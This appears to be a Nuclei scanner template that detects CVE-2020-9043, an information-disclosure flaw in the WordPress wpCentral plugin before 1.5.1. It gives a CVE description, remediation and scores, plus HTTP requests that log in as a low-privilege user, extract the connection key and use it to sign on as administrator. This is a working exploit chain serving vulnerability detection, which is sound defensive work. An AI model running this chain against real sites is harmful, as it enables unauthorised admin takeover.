id: CVE-2020-9043 info: name: WordPress wpCentral <1.5.1 - Information Disclosure author: scent2d severity: high description: | WordPress wpCentral plugin before 1.5.1 is susceptible to information disclosure. An attacker can access the connection key for WordPress Admin account and thus potentially obtain sensitive information, modify data, and/or execute unauthorized operations. remediation: | Update the wpCentral plugin to version 1.5.1 or later to fix the information disclosure vulnerability. reference: - https://wpscan.com/vulnerability/10074 - https://www.wordfence.com/blog/2020/02/vulnerability-in-wpcentral-plugin-leads-to-privilege-escalation/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9043 - https://wordpress.org/plugins/wp-central/#developers - https://nvd.nist.gov/vuln/detail/CVE-2020-9043 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-9043 cwe-id: CWE-200 epss-score: 0.04173 epss-percentile: 0.91196 cpe: cpe:2.3:a:wpcentral:wpcentral:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 4 vendor: wpcentral product: wpcentral framework: wordpress tags: wordpress,wp-plugin,wpcentral,authenticated,wp,wpscan,cve,cve2020 http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/index.php HTTP/1.1 Host: {{Hostname}} - | GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1 Host: {{Hostname}} - | GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1 Host: {{Hostname}} cookie-reuse: true req-condition: true host-redirects: true max-redirects: 2 matchers: - type: dsl dsl: - "contains(header_4, 'text/html')" - "status_code_4 == 200" - "contains(body_4, 'wpCentral Connection Key')" - contains(body_4, "pagenow = \'dashboard\'") condition: and extractors: - type: regex name: authkey group: 1 regex: - 'style="word-wrap:break-word;">([a-z0-9]+)' internal: true part: body - type: regex name: nonce group: 1 regex: - '_wpnonce=([0-9a-z]+)' internal: true part: body # digest: 490a00463044022064316f8bca39d6678b627467552598f8dd37bc55000eb750169f0c929f8c573102205d67175f3ddfbb8645dd2186ea1a04fe1300e1fdc80fef1d41dac4a98980613f:922c64590222798bb761d5b6d8e72950